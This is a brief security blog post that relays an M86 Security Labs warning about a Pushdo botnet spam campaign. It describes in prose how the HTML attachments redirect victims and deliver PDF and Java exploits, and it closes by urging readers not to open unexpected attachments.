Home > All, Blogs > BLOGS: M86 Pushdo warning highlights the need for user security awareness

BLOGS: M86 Pushdo warning highlights the need for user security awareness

M86 Security Labs has highlighted a new spam/malware campaign from the Pushdo botnet. Subjects include the currently obligatory World Cup reference, e-cards, and the standard ‘account information’. The payload is delivered in an attached html file, which, needless to say, includes obfuscated JavaScript malware.

If loaded, the JS redirects to a page on several different web servers, which in turn loads a hidden iframe before redirecting again to a Canadian pharmacy website. The iframe contains the malware:

This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.

The script then checks if Java (Thats Sun Microsystem’s Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.

The exploits install an executable named game.exe which we have not yet analyzed and is not detected by many anti virus products.

Once again we see the importance of user awareness: your anti-malware security software might not protect you; but it won’t need to if you simply don’t click on unexpected attachments.

Blog entry

Categories: All, Blogs
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s